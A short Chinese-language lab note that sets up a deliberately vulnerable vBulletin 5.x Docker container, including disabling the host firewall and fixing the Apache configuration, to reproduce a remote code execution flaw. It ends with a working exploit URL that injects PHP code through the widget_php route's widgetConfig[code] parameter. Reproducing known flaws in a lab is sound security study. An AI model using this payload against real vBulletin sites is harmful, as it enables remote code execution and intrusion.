我是使用docker复现的
环境搭建
自行搭建好docker
首先
查看防火墙状态:
systemctl status firewalld.service
绿色为开启,开启时无法打开网页
执行关闭命令:
systemctl stop firewalld.service
下载vBulletin 5.x RCE的docker
docker run -ti -p 80:80 --name vbulletin -d p8361/vbulletin-cve-2015-7808
查看docker Container Id并进入
docker ps
docker exec -it Container-ID /bin/bash
看能否使用vim,不能就或者使用vi进行修改配置
#更新并下载vim
apt-get update
apt install vim
#修改配置
vim /etc/apache2/apache2.con
# 在最下面补上这条配置
ServerName localhost:80
#然后保存
:wq
#给根目录下的run.sh权限并启动
chmod +x ./run.sh
./run.sh
漏洞复现
http://IP/?routestring=ajax%2Frender%2Fwidget_php&widgetConfig[code]=phpinfo();exit;